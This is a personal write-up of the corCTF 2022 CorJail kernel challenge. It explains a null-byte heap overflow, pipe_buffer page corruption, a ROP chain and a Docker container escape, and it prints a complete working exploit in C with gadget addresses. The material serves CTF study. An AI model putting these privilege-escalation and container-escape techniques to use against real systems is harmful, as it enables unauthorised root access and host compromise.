OFF-BY-NULL to Docker Escaping: CorJail (CorCTF 2022)

📑 Prologue

This write-up documents my attempt at the CTF challenge CorJail from corCTF 2022. The challenge resources are available in the corCTF GitHub repo, and the author’s write-up is also a good study resource. I exploited the challenge on my own, so my method differs from the author’s. I’ll introduce the small problems I encountered and talk about the technical skills this challenge requires.

🏔️ Build the Environment

Unlike other challenges in the official GitHub repo, this one ships only a bzImage and no filesystem. To reproduce the challenge, we have to rebuild the filesystem. The infrastructure is in the pwn/corjail/task/build/ directory. I found it hard to finish building the environment on Ubuntu 22.04 but easy on Ubuntu 20.04. I used the build_image.sh script to build the filesystem.

Considering the complex setup of this challenge, I also made some modifications to simplify local debugging. In this challenge, we are asked to first exploit a bug in a kernel module to get root privileges and then escape the Docker container. With the correct environment, we get a shell in a Docker container that runs inside a QEMU VM. To ease debugging, we need to support the following two features:

  1. Get a root shell on the QEMU VM so we can get kernel information (kallsyms, modules) more easily
  2. Upload the EXP (our exploit binary): I included a static netcat binary and modified the init/jail scripts (/usr/local/bin) on the QEMU VM to support this. Only after I solved the challenge and read the official write-up did I notice that the container already has network access and curl. In my method, I kept a script running in the background after adding a forwarding setting for QEMU (-net user,hostfwd=tcp::49999-:49998):
#!/bin/bash
while true
do
nc -lp 49998  > /exp
chmod +x /exp
docker cp /exp `docker ps -aq`:/
done

After building the filesystem with the debugging tools included, we can run it with the ./run_challenge.sh script and get an unprivileged user shell in the Docker container, with a very cool CoROS logo. If we send a binary to port 49999 on the host (cat ./exp | nc -v 0.0.0.0 49999), an EXP binary shows up in the Docker container.

🎮 Challenge

The challenge implements a kernel module that enables syscall usage monitoring. If we reverse the kernel module (cormon.ko), it’s not hard to locate the bug in cormon_proc_write:

  kheap_obj = (char *)kmem_cache_alloc_trace(kmalloc_caches[12], 2592LL, 4096LL);
  printk(&unk_578, kheap_obj);
  if ( kheap_obj )
  {
    _check_object_size(kheap_obj, length_user, 0LL);
    if ( copy_from_user(kheap_obj, a2, length_user) )
    {
      printk(&unk_5D0, a2);
      return -14LL;
    }
    else
    {
      kheap_obj[length_user] = 0; // Overflow with a null byte
      if ( (unsigned int)update_filter(kheap_obj) )
      {
        kfree(kheap_obj);
        return -22LL;
      }
...

The bug is an overflow, but only a single null byte overflows a 0x1000-byte object. There are two important facts about this vulnerability:

  1. The object size is fixed at 0x1000 bytes
  2. The overflow writes a single null byte

This bug was not hard for me to exploit, since I had exploited a similar bug with a similar method.

🗡️ Solution

We have to use the extra null byte to corrupt some metadata and gain more control, and there is a perfect candidate for that: pipe_buffer. A pipe_buffer holds a page pointer at offset 0, which means we can overwrite its lowest byte to make it point to another page:

struct pipe_buffer {
	struct page *              page;                 /*     0     8 */
	unsigned int               offset;               /*     8     4 */
	unsigned int               len;                  /*    12     4 */
	const struct pipe_buf_operations  * ops;         /*    16     8 */
	unsigned int               flags;                /*    24     4 */

	/* XXX 4 bytes hole, try to pack */

	long unsigned int          private;              /*    32     8 */

	/* size: 40, cachelines: 1, members: 6 */
	/* sum members: 36, holes: 1, sum holes: 4 */
	/* last cacheline: 40 bytes */
};

Here are my gdb functions to convert a page struct address to a virtual address and back:

set $VM=0xffff888000000000
set $BASE=0xffffffff81000000
set $PAGE=0xffffea0000000000
define p2v
    p/x ($arg0-$PAGE)*0x40+$VM
end
define v2p
    p/x ($arg0-$VM)/0x40+$PAGE
end

Assume a pipe_buffer array sits right after the vulnerable object and its first page pointer ends with 0x40 (e.g., 0xffffea0000000040). If we overflow and change it to 0xffffea0000000000, it points to the page before the one it should point to, which gives us read and write access (AAR/AAW) on that page.

So our plan is:

  1. Spray lots of pipe_buffer array objects (size=0x1000)
  2. Create a hole in them
  3. Trigger the bug to overwrite the page struct address in pipe_buffer
  4. Arbitrary Read to leak
  5. Arbitrary Write to gain control flow hijacking

I chose file objects as my targets since I can get a heap address directly from them and they have f_op as the control flow hijacking target. One tip when attacking objects with the pipe_buffer AAR/AAW: do not modify unnecessary data (especially in a Docker container environment). I lost a lot of time because I corrupted such data and triggered a null pointer dereference (in eventpoll_release_file) that killed the kernel. With some kernel heap feng shui, gaining control flow hijacking is not hard. However, I had no experience escaping from a Docker container.

🚀 Docker Escape

From my labmates’ daily chat, I had only heard that it is not hard as long as you have control flow hijacking. So I searched for kernelCTF exploits and found some articles and exploit scripts that do this. I first tried the method described for CVE-2021-22555.

  • Kernel ROP to switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  • setns in usermode to escape
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  char *args[] = {"/bin/bash", "-i", NULL};
  execve(args[0], args, NULL);

This method switches the namespaces of the task with pid=1 to init_nsproxy. It sounds reasonable, but it didn’t work well for me. I then read a more recent exploit from the kernelCTF repo, for CVE-2023-5345_lts_mitigation. It takes a similar approach with similar operations: it looks up the task for the current pid and replaces a pointer in it by hand instead of calling switch_task_namespaces (in the chain I used, the pointer at offset 1760 of the task is overwritten with init_fs). It worked for me!

The ROP chain I used is quite similar to the one from kernelCTF:

    // commit_creds(init_cred)
    ptr[index++] = rdi+1; // one byte past the pop rdi gadget, i.e. a bare ret
    ptr[index++] = rdi;
    ptr[index++] = init_cred;
    ptr[index++] = commit_creds;
    // mov [find_task_by_vpid(getpid())+1760], init_fs
    ptr[index++] = rdi;
    ptr[index++] = getpid();
    ptr[index++] = find_task_by_vpid;
    ptr[index++] = rcx;
    ptr[index++] = 1760; 
    ptr[index++] = add_rax_rcx_ret ; 
    ptr[index++] = rsi ; 
    ptr[index++] = init_fs ; 
    ptr[index++] = mov_qword_ptr_rax_rsi_ret;
    // land userspace
    ptr[index++] = swap_gs_iret;
    ptr[index++] = 0;
    ptr[index++] = 0;
    ptr[index++] = shellx;
    ptr[index++] = user_cs;
    ptr[index++] = user_rflags;
    ptr[index++] = user_sp|8;
    ptr[index++] = user_ss;

⚔️ EXP

#include "libx.h"
// https://github.com/n132/libx.git
#define NR_PIPE 0x7
int fd = 0 ; 
size_t pivot, RBP_VAL;
void tainRegs(u64 base,u64 heap){
    
    pivot   = 0xffffffff819a71fc - NO_ASLR_BASE + base; 
    RBP_VAL = heap;
    __asm__("mov rax, 0x9999999999999990;"
    "mov rbx, 0x9999999999999991;"
    "mov rcx, 0x9999999999999992;"
    "mov rdx, 0x9999999999999993;"
    "mov rdi, 0x9999999999999994;"
    "mov rsi, 0x9999999999999995;"
    "mov r8,  0x9999999999999996;"
    "mov r9,  0x9999999999999997;"
    "mov r10, 0x9999999999999998;"
    "mov r11, 0x9999999999999999;"
    "mov r12, 0x999999999999999a;"
    "mov r13, pivot;"
    "mov r14, 0x99999999999999fc;"
    "mov r15, RBP_VAL;"
    "leave;"
    "ret;");
}
void shellx(){
    char *sh_args[] = {"sh", NULL};
    execve("/bin/sh", sh_args, NULL);
    while(1);
}
void _sigsegv_handler2(int sig, siginfo_t *si, void *unused) {
    
    info("Libx: SegFault Handler is spawning a shell...");
    shellx();
    while(1); // Technically, we never hit this line
}
void hook_segfault2(){
    struct sigaction sa;
    memset(&sa, 0, sizeof(sa)); // sizeof(sigaction) would name the function, not the struct
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = SA_SIGINFO;
    sa.sa_sigaction = _sigsegv_handler2;

    if (sigaction(SIGSEGV, &sa, NULL) == -1) {
        perror("hook_segfault");
        exit(EXIT_FAILURE);
    }
    // info("SegFault Hooked");
}
void libxInitX(){
    pinCPU(0);
    impLimit();
    hook_segfault2();
    initPipeBuffer(pipe_fd);
    initSocketArray(sk_fd);
    success("Libx Inited");
}
int  attempt(){

    char *T = malloc(0x10000);
    memset(T,0,0x10000);
    memset(T,'i',0x1000);
    memcpy(T,p64(0xdeadbeef),8);
    fd = open("/proc_rw/cormon",2);

    libxInitX();
    int fds[0x400] = {};
    for(int i = 0 ; i < 0x180 ;i++)
        fds[i] = open("/etc/passwd",0);
    

    int fengshui[2];
    pipe(fengshui);
    int shuifeng[2];
    pipe(shuifeng);
    pipeBufferResize(fengshui[0],0x40); 
    pipeBufferResize(shuifeng[0],0x40); 
    // 0x40*0x28 = 0xa00 
    
    int victim[NR_PIPE][2];
    for(int i = 0 ; i < NR_PIPE;i++)
        pipe(victim[i]);
    for(int i = 0 ; i < 0x1c; i++)
        for(int j = 0 ; j < 0x6;j++)
            write(sk_fd[i][1],T,0x1000-0x140);
    for(int i = 0x1c ; i < 0x20; i++)
        write(sk_fd[i][1],T,0x1000-0x140);
    // Poke 4 holes
    for(int i = 0x1c ; i < 0x20; i++)
        read(sk_fd[i][0],T+0x8000,0x1000-0x140);
    // Fill the holes
    for(int i = 0 ; i < NR_PIPE; i++)
        pipeBufferResize(victim[i][0],0x40);
    
    // Fengshui
    for(int i = 0 ; i < 0x40; i++)
        write(fengshui[1],T,0x1000); // Lift the end

    
    int ct =  0x180;
    for(int z =0 ;z <NR_PIPE; z++)
    {
        
        memcpy(T,p64(0xcafebabe000+z),8);
        write(victim[z][1],T,0xc28);
        for(int i = 0x20 ; i < 0x40 ;i++)
            fds[ct++] = open("/etc/passwd",0);
    }
    
    // debug();
    read(sk_fd[0x1c-1][0],T+0x8000,0x1000-0x140);
    write(fd,T+0x6000,0x1000);
    // debug();
    size_t TARGET_ADDR = 0;
    size_t KASLR = 0;
    size_t idx  = -1;
    char buf[0x100]={};
    for(int i = 0 ; i < NR_PIPE ;i++)
    {
        memset(buf,0,0x100);
        read(victim[i][0],buf,0x100);
        size_t permission = *(size_t *)(buf+0x40);

        if(0x6c0a801d04048000 == permission)
        {
            TARGET_ADDR = *(size_t *)(buf+0x58) -0x58;
            KASLR = *(size_t *)(buf+0x28) - 0x1040400;
            if(KASLR&0xfffff){
                KASLR = (KASLR+0x800000)>>24<<24;
            }
            idx = i;
            goto ALIVE;
        }
    }
    warn("💔 Unfortunately...");
    exit(0);

    ALIVE:
    success(hex(KASLR));
    success(hex(TARGET_ADDR));
    size_t * ptr = 0;
    ptr     = (size_t *)(buf+0x28);
    *ptr    = (size_t)((TARGET_ADDR>>12<<12)+0x20000 -0x78);

    ptr = (size_t *)T;
    int index = 0 ;
    memset(ptr,0,0x1000);

    size_t rdi = 0xffffffff819e52dd - NO_ASLR_BASE + KASLR;
    size_t rcx = 0xffffffff8192f977 - NO_ASLR_BASE + KASLR;
    size_t rdx = 0xffffffff81a0518a - NO_ASLR_BASE + KASLR;
    size_t rsi = 0xffffffff81a0edd8 - NO_ASLR_BASE + KASLR;
    size_t gadget                   = 0xffffffff8111138a - NO_ASLR_BASE + KASLR;
    size_t init_cred                = 0xffffffff8245a960 - NO_ASLR_BASE + KASLR;
    size_t commit_creds             = 0xffffffff810eba40 - NO_ASLR_BASE + KASLR;
    size_t swap_gs_iret             = 0xffffffff81c00f06 - NO_ASLR_BASE + KASLR;
    size_t init_nsproxy             = 0xffffffff8245a720 - NO_ASLR_BASE + KASLR;
    size_t add_rax_rcx_ret          = 0xffffffff810587d3 - NO_ASLR_BASE + KASLR;
    size_t find_task_by_vpid        = 0xffffffff810e4fc0 - NO_ASLR_BASE + KASLR;
    size_t switch_task_namespaces   = 0xffffffff810ea4e0 - NO_ASLR_BASE + KASLR;
    size_t mov_qword_ptr_rax_rsi_ret= 0xffffffff815b55c1 - NO_ASLR_BASE + KASLR;
    size_t init_fs                  = 0xffffffff82589740 - NO_ASLR_BASE + KASLR;

    ptr[index++] = gadget;
    saveStatus();
    index = 0x21;
    ptr[index++] = rdi+1;
    ptr[index++] = rdi;
    ptr[index++] = init_cred;
    ptr[index++] = commit_creds;
    ptr[index++] = rdi;
    ptr[index++] = getpid();
    ptr[index++] = find_task_by_vpid;
    ptr[index++] = rcx;
    ptr[index++] = 1760; 
    ptr[index++] = add_rax_rcx_ret ; 
    ptr[index++] = rsi ; 
    ptr[index++] = init_fs ; 
    ptr[index++] = mov_qword_ptr_rax_rsi_ret;
    ptr[index++] = swap_gs_iret;
    ptr[index++] = 0;
    ptr[index++] = 0;
    ptr[index++] = shellx;
    ptr[index++] = user_cs;
    ptr[index++] = user_rflags;
    ptr[index++] = user_sp|8;
    ptr[index++] = user_ss;
    for(int i = 0 ; i < 0x40; i++)
        write(shuifeng[1],T,0x1000); 

    debug();
    size_t res = write(victim[idx][1],buf+0x28,8);
    success("🚀 Escaping...");
    tainRegs(KASLR,(u64)((TARGET_ADDR>>12<<12)+0x20000+0x100));
    for(int i = 0 ; i < ct ; i++)
        close(fds[i]);
    exit(0);
}
int  main(){
    while(1) {
        if(!fork())
            attempt();
        else
            wait(NULL);
    }
}

🧙🏽‍♂️ Epilogue

This is a complete challenge that covers bug discovery, exploitation, and Docker escape. I practiced some pipe_buffer and heap feng shui skills on it and performed my first Docker escape!

Also, this challenge means a lot to me since it’s the last CTF challenge Kyle sent me for practice. I solved it independently within two days. Now I can confidently say that I know some kernel exploitation and I am ready to start reproducing CVEs!